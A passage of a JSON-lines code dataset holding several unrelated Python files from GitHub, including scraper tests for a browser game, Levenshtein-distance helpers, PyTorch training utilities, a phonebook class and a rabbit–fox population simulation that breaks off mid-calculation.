\n","repo_name":"SpisTresci/spistresci","sub_path":"spistresci/connectors/specific/Czytio.py","file_name":"Czytio.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"26614043479","text":"from pathlib import Path\n\nimport httpx\nimport pytest\nfrom asgiref.sync import async_to_sync\n\nfrom .factories import ItemFactory\nfrom .models import Item\nfrom .parsers import ParsedIngredient, parse_item\nfrom .tasks import scrape_from_api\n\nFIXTURES_ROOT = Path(__file__).joinpath(\"../fixtures\").resolve()\n\n\n@pytest.fixture\ndef scissors() -> bytes:\n return FIXTURES_ROOT.joinpath(\"item_scissors.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef mc02() -> bytes:\n return FIXTURES_ROOT.joinpath(\"item_mystical_chest_02.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef cornucopia() -> bytes:\n return FIXTURES_ROOT.joinpath(\"item_cornucopia.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef gb02() -> bytes:\n return FIXTURES_ROOT.joinpath(\"item_grab_bag_02.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef snowball() -> bytes:\n return FIXTURES_ROOT.joinpath(\"item_snowball.html\").open(\"rb\").read()\n\n\ndef test_parse_recipe(scissors: bytes):\n item = parse_item(scissors)\n assert item.recipe == [\n ParsedIngredient(id=95, quantity=1),\n ParsedIngredient(id=38, quantity=1),\n ParsedIngredient(id=145, quantity=2),\n ParsedIngredient(id=40, quantity=1),\n ParsedIngredient(id=35, quantity=2),\n ]\n assert item.locksmith == []\n assert item.flea_market_price is None\n assert item.from_event is False\n\n\ndef test_parse_locksmith(mc02: bytes):\n item = parse_item(mc02)\n assert item.recipe == []\n assert item.locksmith == [\n ParsedIngredient(id=350, quantity=3),\n ParsedIngredient(id=500, quantity=3),\n ParsedIngredient(id=538, quantity=3),\n ParsedIngredient(id=266, quantity=1),\n ParsedIngredient(id=373, quantity=2),\n ]\n\n\ndef test_parse_locksmith_gold(cornucopia: bytes):\n item = parse_item(cornucopia)\n assert item.recipe == []\n assert item.locksmith[0] == ParsedIngredient(id=0, gold=True, quantity=25)\n\n\ndef test_parse_fleamarket(gb02: bytes):\n item = parse_item(gb02)\n assert item.flea_market_price == 4\n\n\ndef test_parse_event(snowball: bytes):\n item = parse_item(snowball)\n assert item.from_event is True\n\n\n@pytest.mark.django_db\ndef test_scrape_from_api_grape_pie(respx_mock):\n api_data = [\n {\n \"id\": 726,\n \"xp\": 6500,\n \"img\": \"/img/items/grapepie.png\",\n \"name\": \"Concord Grape Pie\",\n \"type\": \"item\",\n \"can_buy\": 0,\n \"can_sell\": 1,\n \"cookable\": 1,\n \"mailable\": 0,\n \"buy_price\": 0,\n \"craftable\": 0,\n \"masterable\": 1,\n \"reg_weight\": 3000,\n \"sell_price\": 25000000,\n \"description\": \"A super yummy pie full of grapes\",\n \"cooking_level\": 40,\n \"crafting_level\": 1,\n \"runecube_weight\": 3000,\n \"cooking_recipe_id\": 727,\n \"base_yield_minutes\": 720,\n \"min_mailable_level\": 0,\n \"manfish_only\": 0,\n \"loot_key_id\": 0,\n \"loot_rand\": 0,\n \"loot_gold\": 0,\n \"loot\": 0,\n \"event\": 0,\n \"fm_buy\": 0,\n \"fm_price\": 0,\n \"fm_rotate\": 0,\n }\n ]\n respx_mock.get(\"https://farmrpg.com/api/item/726\").mock(\n return_value=httpx.Response(200, json=api_data)\n )\n ItemFactory(id=727, name=\"Pie Recipe\")\n async_to_sync(scrape_from_api)(726)\n item = Item.objects.get(id=726)\n assert item.cooking_recipe_item.name == \"Pie Recipe\"\n","repo_name":"coderanger/farmrpg-etl2","sub_path":"src/farmrpg_etl/items/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13364036902","text":"from PIL import Image\r\nimport numpy as np\r\n\r\ndef compute_dice(label_img, pred_img, p_threshold=0.5):\r\n p = pred_img.astype(np.float32)\r\n l = label_img.astype(np.float32)\r\n if p.max() > 127:\r\n p /= 255.\r\n if l.max() > 127:\r\n l /= 255.\r\n\r\n p = np.clip(p, 0, 1.0)\r\n l = np.clip(l, 0, 1.0)\r\n p[p > p_threshold] = 1.0\r\n p[p < p_threshold] = 0.0\r\n l[l > p_threshold] = 1.0\r\n l[l < p_threshold] = 0.0\r\n product = np.dot(l.flatten(), p.flatten())\r\n dice_num = 2 * product + 1\r\n pred_sum = p.sum()\r\n label_sum = l.sum()\r\n dice_den = pred_sum + label_sum + 1\r\n dice_val = dice_num / dice_den\r\n return dice_val\r\n\r\n#input_path = '/home/jsy/font/new_font_120_500_1000_SR/fake_samples-154-450_train.png'\r\ninput_path = '/home/jsy/font/son_img/fake_samples-74-1050_train.png'\r\n### original base-GAN\r\n#input_path = '/home/jsy/font/son_fontGAN/fake_samples-261-100_train.png'\r\n#input_path = '/home/jsy/font/son_img/fake_samples-74-1050_train.png'\r\n### fine-tuning base-GAN\r\n\r\n#target_path = '/home/jsy/font/fixed_set/t_fixed_target2.png'\r\ntarget_path = '/home/jsy/font/fixed_set/t_fixed_target.png'\r\na = Image.open(input_path)\r\n#a = (np.ones((262, 1042, 3)) * 255).astype(np.uint8)\r\n\r\n# rand = np.random.rand(262, 1042, 3)\r\n# a = (rand * 255).astype(np.uint8)\r\n# a = (np.zeros((262, 1042, 3))).astype(np.uint8)\r\na = np.asarray(a)\r\n\r\nb = Image.open(target_path)\r\nb = np.asarray(b)\r\n\r\nscore = compute_dice(a, b)\r\nprint(score)","repo_name":"youwantsy/fontGAN","sub_path":"dice_score.py","file_name":"dice_score.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"5392372545","text":"import logging\n\n# a negative more than one eases debugging\nNOT_EXISTENT = 1000\n\ndef get_matrix_detailed(word1, word2):\n matrix = []\n prev_l = []\n # \"0\" is any character, just to make the initialization\n for i, c2 in enumerate(\"0\" + word2):\n logging.debug(f\"c2: {c2}\")\n l = []\n for j, c1 in enumerate(\"0\" + word1):\n\n candidates = []\n logging.debug(f\"c1: {c1}\")\n\n if len(prev_l) > 0 and len(l) > 0:\n diag = prev_l[j-1]\n if c1 == c2:\n if diag[3] == NOT_EXISTENT:\n candidates.append(0)\n else:\n candidates.append(diag[3])\n else:\n if diag[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n candidates.append(diag[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after diag: {candidates}\")\n\n if len(prev_l) > 0:\n above = prev_l[j]\n if above[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n candidates.append(above[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after above: {candidates}\")\n\n if len(l) > 0:\n left = l[j-1]\n if left[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n candidates.append(left[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after left: {candidates}\")\n\n current = min(candidates)\n logging.debug(\"current\")\n logging.debug(current)\n\n candidates.append(current)\n l.append(candidates)\n\n prev_l = l\n matrix.append(l)\n\n return matrix\n\ndef get_matrix(word1, word2):\n matrix = []\n prev_l = []\n for i, c2 in enumerate(\"0\" + word2):\n l = []\n for j, c1 in enumerate(\"0\" + word1):\n\n candidates = []\n\n if len(prev_l) > 0:\n above = prev_l[j]\n candidates.append(above+1)\n\n if len(l) > 0:\n left = l[j-1]\n candidates.append(left+1)\n\n if len(prev_l) > 0 and len(l) > 0:\n diag = prev_l[j-1]\n if c1 == c2:\n candidates.append(diag)\n else:\n candidates.append(diag+1)\n\n current = min(candidates) if len(candidates) > 0 else 0\n l.append(current)\n\n prev_l = l\n matrix.append(l)\n\n return matrix\n\ndef display_matrix(word1, word2, matrix):\n out = \"\\n \" + \", \".join(word1) + \"\\n\"\n out += (len(out)-1) * \"-\" + \"\\n\"\n for i, l in enumerate(matrix):\n if (i >= 1):\n out += word2[i-1] + \"|\" + str(l) + \"\\n\"\n else:\n out += \" |\" + str(l) + \"\\n\"\n\n return out\n\ndef clean_list(l):\n newl = []\n for subl in l:\n newsubl = []\n for val in subl:\n if val == NOT_EXISTENT:\n newval = \" \"\n else:\n newval = str(val)\n newsubl.append(newval)\n newl.append(newsubl)\n logging.debug(f\"l: {l}\")\n logging.debug(f\"newl: {newl}\")\n return newl\n\ndef display_matrix_detailed(word1, word2, matrix):\n out = \"\\n \" + \" , \".join(word1) + \"\\n\"\n out += (len(out)-1) * \"-\" + \"\\n\"\n for i, l in enumerate(matrix):\n for j in range(2):\n if j == 0 and i >= 1:\n out += f\"{word2[i-1]}|\"\n else:\n out += \" |\"\n if j == 0:\n newl = [ f\"/{val[0]}, {val[1]}\\\\\" for val in clean_list(l)]\n out += \" \".join(newl) + \"\\n\"\n else: #j == 1\n newl = [ f\"\\{val[2]}, {val[3]}/\" for val in clean_list(l)]\n out += \",\".join(newl) + \"\\n\\n\"\n\n return out\n\ndef get_from_words(word1, word2):\n matrix = get_matrix(word1, word2)\n\n return matrix[-1][-1]\n\ndef get(matrix):\n return matrix[-1][-1]\n\n","repo_name":"weshouman/tut-py-irtx","sub_path":"tut_py_irtx/lev_dist.py","file_name":"lev_dist.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74868171983","text":"import math\nimport os\n\nimport torch\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom tqdm import tqdm\n\n\ndef get_device():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"[Info]: Use {device} now!\")\n return device\n\n\ndef build_dir(model_name):\n os.makedirs('checkpoints/{}'.format(model_name), exist_ok=True)\n\n\ndef get_cosine_schedule_with_warmup(\n optimizer: Optimizer,\n num_warmup_steps: int,\n num_training_steps: int,\n num_cycles: float = 0.5,\n last_epoch: int = -1,\n):\n \"\"\"\n Create a schedule with a learning rate that decreases following the values of the cosine function between the\n initial lr set in the optimizer to 0, after a warmup period during which it increases linearly between 0 and the\n initial lr set in the optimizer.\n\n Args:\n optimizer (:class:`~torch.optim.Optimizer`):\n The optimizer for which to schedule the learning rate.\n num_warmup_steps (:obj:`int`):\n The number of steps for the warmup phase.\n num_training_steps (:obj:`int`):\n The total number of training steps.\n num_cycles (:obj:`float`, `optional`, defaults to 0.5):\n The number of waves in the cosine schedule (the defaults is to just decrease from the max value to 0\n following a half-cosine).\n last_epoch (:obj:`int`, `optional`, defaults to -1):\n The index of the last epoch when resuming training.\n\n Return:\n :obj:`torch.optim.lr_scheduler.LambdaLR` with the appropriate schedule.\n \"\"\"\n def lr_lambda(current_step):\n # Warmup\n if current_step < num_warmup_steps:\n return float(current_step) / float(max(1, num_warmup_steps))\n # decadence\n progress = float(current_step - num_warmup_steps) / float(\n max(1, num_training_steps - num_warmup_steps))\n return max(\n 0.0, 0.5 *\n (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress)))\n\n return LambdaLR(optimizer, lr_lambda, last_epoch)\n\n\ndef model_fn(batch, model, criterion, device):\n \"\"\"Forward a batch through the model.\"\"\"\n\n mels, labels = batch\n mels = mels.to(device)\n labels = labels.to(device)\n\n outs = model(mels)\n\n loss = criterion(outs, labels)\n\n # Get the speaker id with highest probability.\n preds = outs.argmax(1)\n # Compute accuracy.\n accuracy = torch.mean((preds == labels).float())\n\n return loss, accuracy\n\n\ndef valid(dataloader, model, criterion, device):\n \"\"\"Validate on validation set.\"\"\"\n\n model.eval()\n running_loss = 0.0\n running_accuracy = 0.0\n pbar = tqdm(total=len(dataloader.dataset),\n ncols=0,\n desc=\"Valid\",\n unit=\" uttr\")\n\n for i, batch in enumerate(dataloader):\n with torch.no_grad():\n loss, accuracy = model_fn(batch, model, criterion, device)\n running_loss += loss.item()\n running_accuracy += accuracy.item()\n\n pbar.update(dataloader.batch_size)\n pbar.set_postfix(\n loss=f\"{running_loss / (i+1):.2f}\",\n accuracy=f\"{running_accuracy / (i+1):.2f}\",\n )\n\n pbar.close()\n model.train()\n\n return running_accuracy / len(dataloader)\n","repo_name":"SilenceX12138/Machine-Learning-Theory-and-Application","sub_path":"4-sequence-classification/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"71389606222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 26 14:40:37 2019\r\n\r\n@author: Alex8Cabarcos\r\n\"\"\"\r\n\r\nimport fmpy\r\nfrom matplotlib import pyplot as plt\r\n\r\ndahl = 'Dahlquist1.fmu';\r\n#fmpy.dump(dahl)\r\n#results=fmpy.simulate_fmu(dahl)\r\n#results=fmpy.simulate_fmu(dahl,start_values={'x':3})\r\n#l =['hello',1.0,2];\r\n#print(l[0])\r\n#l.append('bye')\r\nresult = [];\r\nxStart = [i for i in range(11)]\r\n#list_a = list(range(11))\r\n#len(xStart)==len(list_a)\r\n\r\nfor i in xStart:\r\n rs = fmpy.simulate_fmu(dahl,start_values={'x':i},start_time=0,stop_time=5)\r\n result.append(rs)\r\n\r\nfor j in range(11): \r\n plt.plot(result[j]['time'],result[j]['x'])\r\n\r\n\r\nplt.xlabel(\"Time (s)\")\r\nplt.ylabel(\"x\")\r\nplt.grid(color='grey', linestyle='-', linewidth=2)\r\nkValues = [0,1,2,3,4,5,6,7,8,9]\r\nplt.legend(kValues)\r\n\r\n#dtype little-endian single-precision float\r\n#result[0].dtype.kind 'V'-> raw data","repo_name":"cabarcos19/Optmization","sub_path":"co_simulation.py","file_name":"co_simulation.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3250201663","text":"import os\n\nBASE_DIR = os.environ.get('BASE_DIR')\n\nMODEL_DIR = os.path.join(BASE_DIR, 'trained_models/')\nTMCD_MODEL_DIR = os.path.join(BASE_DIR, 'baseline_replication/TMCD/trained_models/')\n\nDATA_DIR = os.path.join(BASE_DIR, 'data/')\nTMCD_DATA_DIR = os.path.join(BASE_DIR, 'baseline_replication/TMCD/data/')\n\nTMCD_DATASETS = {'SCAN', 'geoquery', 'spider'}\ndataset_color_mapping = {'COGS': '#313b08', 'SCAN': '#313b08', 'spider': '#520c35', 'geoquery': '#520c35', 'NACS': '#2b3a00'}\n\nMODEL_NICE_NAMES = {\n \"lstm_uni\": \"LSTM Uni\",\n \"lstm_bi\": \"LSTM Bi\",\n \"transformer\": \"Transformer\",\n \"t5-base\": \"T5\",\n \"bart-base\": \"BART\",\n \"btg\": \"BTG\"\n}\n\nPRETRAINED_MODEL = {'t5-base', 'bart-base', 'nqg'}\nUNPRETRAINED_MODEL = {'lstm_uni', 'lstm_bi', 'transformer', 'btg'} \nSYNTHETIC_DATA = {'SCAN', 'COGS', 'NACS'}\nNATURAL_DATA = {'geoquery', 'spider'}\n\nDATASET_NICE_NAMES = {\n \"COGS\": \"COGS\",\n \"geoquery\": \"GeoQuery\",\n \"SCAN\": \"SCAN\",\n \"spider\": \"Spider\",\n \"NACS\": \"NACS\"\n}\n\nSPLIT_NICE_NAMES = {\n \"standard\": \"Std\",\n \"length\": \"Length\",\n \"template\": \"Template\",\n \"tmcd\": \"TMCD\",\n \"random\": \"Rand\",\n \"no_mod-test\": \"Std-Test\",\n \"no_mod-gen\": \"Std-Gen\",\n \"simple\": \"Simple\",\n \"addprim_jump\": \"Jump\",\n \"addprim_turn_left\": \"TurnLeft\",\n \"template_around_right\": \"Template\",\n \"mcd1\": \"MCD1\",\n \"mcd2\": \"MCD2\",\n \"mcd3\": \"MCD3\",\n \"add_jump\": \"Jump\",\n \"add_turn_left\": \"TurnLeft\",\n # SCAN Lexical Split Names\n \"turn_left_random_cvcv\": \"TurnLeftRcvcv\",\n \"turn_left_random_str\": \"TurnLeftRStr\",\n \"jump_random_cvcv\": \"JumpRcvcv\",\n \"jump_random_str\": \"JumpRStr\",\n # COGS Lexical Split Names\n \"no_mod\": \"Std\",\n \"random_cvcv-test\": \"Rcvcv-Test\",\n \"random_cvcv-gen\": \"Rcvcv-Gen\",\n \"random_str-test\": \"Rstr-Test\",\n \"random_str-gen\": \"Rstr-Gen\",\n \"random_cvcv\": \"Randcvcv\",\n \"random_str\": \"RandStr\",\n # GeoQ Lexical Split Names\n \"standard_random_cvcv\": \"Std-Rcvcv\",\n \"standard_random_str\": \"Std-Rstr\",\n \"tmcd_random_cvcv\": \"TMCD-Rcvcv\",\n \"tmcd_random_str\": \"TMCD-Rstr\",\n}\n\ndefault_model_names = ['lstm_uni', 'lstm_bi', 'transformer', 't5-base', 'bart-base', 'btg']\ndefault_dataset_mapping = { \n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"COGS\": [\"no_mod-test\", \"no_mod-gen\"],\n \"geoquery\": [\"standard\", \"template\", \"tmcd\", \"length\"], \n \n \"SCAN\": [\"simple\", \"addprim_jump\", \"addprim_turn_left\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\"], \n \n }\n\nall_dataset_mapping = {\"COGS\": [\"no_mod-test\", \"random_cvcv-test\", \"random_str-test\",\n \"no_mod-gen\", \"random_cvcv-gen\", \"random_str-gen\", \"length\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"], \n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"template\", \"length\", \"tmcd\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_dataset_mapping = {\n \"COGS\": [\"no_mod-gen\", \"random_cvcv-test\", \"random_cvcv-gen\", \"random_str-test\", \"random_str-gen\"],\n \"SCAN\": [\"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"],\n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"tmcd\", \"tmcd_random_cvcv\", \"tmcd_random_str\"]\n}\n\nlength_dataset_mapping = {\n \"COGS\": [\"length\"],\n \"SCAN\": [\"length\"],\n \"geoquery\": [\"length\"],\n \"spider\": [\"length\"],\n \"NACS\": [\"length\"]\n}\n\nall_exclude_length_dataset_mapping = {\"COGS\": [\"no_mod-test\", \"random_cvcv-test\", \"random_str-test\",\n \"no_mod-gen\", \"random_cvcv-gen\", \"random_str-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"length\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"], \n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"template\", \"length\", \"tmcd\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\n\nraw_dataset_mapping = {\n \"COGS\": [\"no_mod-test\", \n \"no_mod-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\"], \n \"geoquery\": [\"template\", \"length\", \"standard\", \"tmcd\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_without_orig_dataset_mapping = {\n \"COGS\": [\"random_cvcv-test\", \"random_str-test\", \"random_cvcv-gen\", \"random_str-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\", \"turn_left_random_cvcv\"], \n \"geoquery\": [\"template\", \"length\", \"standard_random_cvcv\", \"standard_random_str\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_w_orig_mapping = {\n \"COGS\": {\n # \"no_mod-test\": [\"random_cvcv-test\", \"random_str-test\"],\n \"no_mod-gen\": [\"random_cvcv-gen\", \"random_str-gen\"]}, \n \"SCAN\": {\"addprim_turn_left\": [\"addprim_turn_left\", \"turn_left_random_cvcv\"]}, \n \"geoquery\": {\n # \"standard\": [\"standard_random_cvcv\", \"standard_random_str\"], \n \"tmcd\": [\"tmcd_random_cvcv\", \"tmcd_random_str\"]},\n}\n","repo_name":"facebookresearch/CompositionalityValidity","sub_path":"utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"846460698","text":"'''\n1021. Remove Outermost Parentheses\n\nA valid parentheses string is either empty (\"\"), \"(\" + A + \")\", or A + B, where \nA and B are valid parentheses strings, and + represents string concatenation. \nFor example, \"\", \"()\", \"(())()\", and \"(()(()))\" are all valid parentheses \nstrings.\n\nA valid parentheses string S is primitive if it is nonempty, and there does not \nexist a way to split it into S = A+B, with A and B nonempty valid parentheses \nstrings.\n\nGiven a valid parentheses string S, consider its primitive decomposition: \nS = P_1 + P_2 + ... + P_k, where P_i are primitive valid parentheses strings.\n\nReturn S after removing the outermost parentheses of every primitive string in \nthe primitive decomposition of S.\n \nExample 1:\nInput: \"(()())(())\"\nOutput: \"()()()\"\nExplanation: \nThe input string is \"(()())(())\", with primitive decomposition \"(()())\" + \"(())\".\nAfter removing outer parentheses of each part, this is \"()()\" + \"()\" = \"()()()\".\n\nExample 2:\nInput: \"(()())(())(()(()))\"\nOutput: \"()()()()(())\"\nExplanation: \nThe input string is \"(()())(())(()(()))\", with primitive decomposition \n\"(()())\" + \"(())\" + \"(()(()))\".\nAfter removing outer parentheses of each part, this is \n\"()()\" + \"()\" + \"()(())\" = \"()()()()(())\".\n\nExample 3:\nInput: \"()()\"\nOutput: \"\"\nExplanation: \nThe input string is \"()()\", with primitive decomposition \"()\" + \"()\".\nAfter removing outer parentheses of each part, this is \"\" + \"\" = \"\".\n \nNote:\nS.length <= 10000\nS[i] is \"(\" or \")\"\nS is a valid parentheses string\n'''\n\n'''\nALGORITHM:\n1. Iterate on the string and keep track of count of open and close brackets.\n2. If c == '(' and open_count == close_count, skip this bracket\n3. If c == ')' and open_count == close_count, skip this bracket\n\nRUNTIME COMPLEXITY: O(N)\nSPACE COMPLEXITY: O(N) for storing result \n'''\n\nclass Solution(object):\n def removeOuterParentheses(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n opn, close = 0,0\n result = []\n for c in S:\n if c == '(':\n opn += 1\n if opn-1 != close:\n result.append(c)\n else:\n close += 1\n if opn != close:\n result.append(c) \n return ''.join(result)\n \n","repo_name":"renukadeshmukh/Leetcode_Solutions","sub_path":"1021_RemoveOutermostParentheses.py","file_name":"1021_RemoveOutermostParentheses.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"34072409960","text":"from models.contact import Contact\n\n\nclass Contacts():\n \"\"\"Contains and manages all contacts. This is a phonebook instance.\n\n Args:\n This class takes no arguments\n\n Returns:\n Returns nothing.\n\n \"\"\"\n\n def __init__(self):\n self.data = {}\n\n def add(self, firstname, surname, number):\n \"\"\"Function for adding contacts to the phonebook instance.\n\n Args:\n firstname: First name of the contact owner.\n surname: Surname of the contact owner.\n number: The actual phone number of the owner.\n\n Returns:\n Returns \"Contact added successfully!\" when a contact is added\n with no issues.\n Returns an error message, \"Contact exists!\" when an attempt to duplicate is noted.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # only add non-existent contacts\n if number not in self.data.keys():\n self.contact = Contact(firstname, surname, number)\n self.data[self.contact.number] = [firstname, surname]\n return(\"Contact added successfully!\")\n else:\n return(\"Contact exists!\")\n\n def edit(self, number, firstname, surname):\n \"\"\"Function for editing contacts in the phonebook instance.\n\n Args:\n firstname: First name of the contact owner.\n surname: Surname of the contact owner.\n number: The actual phone number of the owner.\n\n Returns:\n Returns \"Edit successful!\" when a contact is edited\n with no issues.\n Returns an error message, \"No such contact!\" if the contact in\n question is not in the phonebook.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # prevent accidental addition of new contacts by letting user know\n # if a contact is new.\n if number in self.data.keys():\n self.data[number] = [firstname, surname]\n return(\"Edit successful!\")\n else:\n return(\"No such contact!\")\n\n def view(self):\n \"\"\"This function retrieves all existing contacts.\n\n Args:\n Takes no arguments.\n\n Returns:\n Returns all contacts in a dictionary format.\n\n \"\"\"\n return(self.data)\n\n def delete(self, number):\n \"\"\"Function for deleting contacts from the phonebook instance.\n\n Args:\n number: The contact number to be deleted.\n\n Returns:\n Returns \"Contact deleted!\" when a contact is deleted\n with no issues.\n Returns an error message, \"No such contact!\" if the\n if the contact did not exist on delete request.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # Check for existence before deletion.\n if number in self.data.keys():\n del self.data[number]\n return(\"Contact deleted!\")\n else:\n return(\"No such contact!\")\n","repo_name":"JoshuaOndieki/contacts","sub_path":"models/phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"25301242633","text":"\"\"\"\n\n\"\"\"\n\n# make sure to import things that you need...\n\ndef main():\n\timport math\n\t# rbr is the rabbit birth rate without predation \n\trBr = 0.01\n\n\t# fbr is the fox birth rate when no rabbits are available \n\tfBr = 0.005\n\n\t# interaction is the likelihood that a rabbit and fox will meet\n\tI = 0.00001\n\n\t# hunt is the likelihood that when a fox & rabbit meet that the fox catches\n\t# the rabbit\n\tS = 0.01\n\t\n\t# rabbits is the current rabbit population\n\tr = int(input(\"\\nPlease enter the initial rabbit population: \"))\n\n\t# foxes is the current fox population \n\tf = int(input(\"Please enter the initial foxes population: \"))\n\n\t# num_days is the number of days to run the simulation\n\tnumD = int(input(\"Please enter the number of days to run the simulation: \"))\n\t\n\t# display_freq is how often to display results in the table, does not impact calculations\n\t#\tdisplay always starts with initial populations\n\tdisplayFreq = int(input(\"Please enter the frequency of days for displaying data: \"))\n\n\t# this code sets up two lists to contain the populations from the rounding calculations\n\t#\tthe first values in the list are the starting populations entered by the user \n\trR = [r]\n\trF = [f]\n\trRabbitsAvg = 0\n\trFoxesAvg = 0\n\t\n\tfR = [r]\n\tfF = [f]\n\tfRabbitsAvg = 0\n\tfFoxesAvg = 0\n\t\n\tcR = [r]\n\tcF = [f]\n\tcRabbitsAvg = 0\n\tcFoxesAvg = 0\n\t\n\tflR = [r]\n\tflF = [f]\n\tflRabbitsAvg = 0\n\tflFoxesAvg = 0\n\t\n\t\n\t# Perform all of the population calculations in this loop\n\t# The new population values get appended to their corresponding lists \n\tfor i in range(0, numD + 1):\n\t\t# pass keeps Python from generating an error without any code in the loop\n\t\t# You can remove it or leave it\n\t\tpass\n\t\t\n\t\t# compute the new number of rabbits and foxes for the day and round the result\n\t\tchangeR = round(rBr * rR[i] - I * rR[i] * rF[i])\n\t\tchangeF = round(I * S * rR[i] * rF[i] - fBr * rF[i])\n\t\t\n\t\trR.append(rR[i] + changeR)\n\t\trF.append(rF[i] + changeF)\n\n\t\t# compute the new number of rabbits and foxes for the day and take the ceiling of result\n\t\tchangeR = math.floor(rBr * fR[i] - I * fR[i] * fF[i])\n\t\tchangeF = math.floor(I * S * fR[i] * fF[i] - fBr * fF[i])\n\t\t\n\t\tfR.append(fR[i] + changeR)\n\t\tfF.append(fF[i] + changeF)\n\t\t\n\t\t# compute the new number of rabbits and foxes for the day and take the floor of result\n\t\tchangeR = math.ceil(rBr * cR[i] - I * cR[i] * cF[i])\n\t\tchangeF = math.ceil(I * S * cR[i] * cF[i] - fBr * cF[i])\n\t\t\n\t\tcR.append(cR[i] + changeR)\n\t\tcF.append(cF[i] + changeF)\n\t\t\t\t\n\t\t# compute the new number of rabbits and foxes for the day and leave as a fraction\n\t\tchangeR = float(rBr * flR[i] - I * flR[i] * flF[i])\n\t\tchangeF = float(I * S * flR[i] * flF[i] - fBr * flF[i])\n\t\t\n\t\tflR.append(flR[i] + changeR)\n\t\tflF.append(flF[i] + changeF)\n\t\t\n\t\n\t# calculate all of the averages\n\tfor i in range(0, numD + 1):\n\t\trRabbitsAvg = rR[i] + rRabbitsAvg\n\t\trFoxesAvg = rF[i] + rFoxesAvg\n\t\t\n\t\tfRabbitsAvg = fR[i] + fRabbitsAvg\n\t\tfFoxesAvg = fF[i] + fFoxesAvg\n\t\t\n\t\tcRabbitsAvg = cR[i] + cRabbitsAvg\n\t\tcFoxesAvg = cF[i] + cFoxesAvg\n\t\t\n\t\tflRabbitsAvg = flR[i] + flRabbitsAvg\n\t\tflFoxesAvg = flF[i] + flFoxesAvg\n\t\t\n\trRabbitsAvg = rRabbitsAvg/(numD + 1)\n\trFoxesAvg = 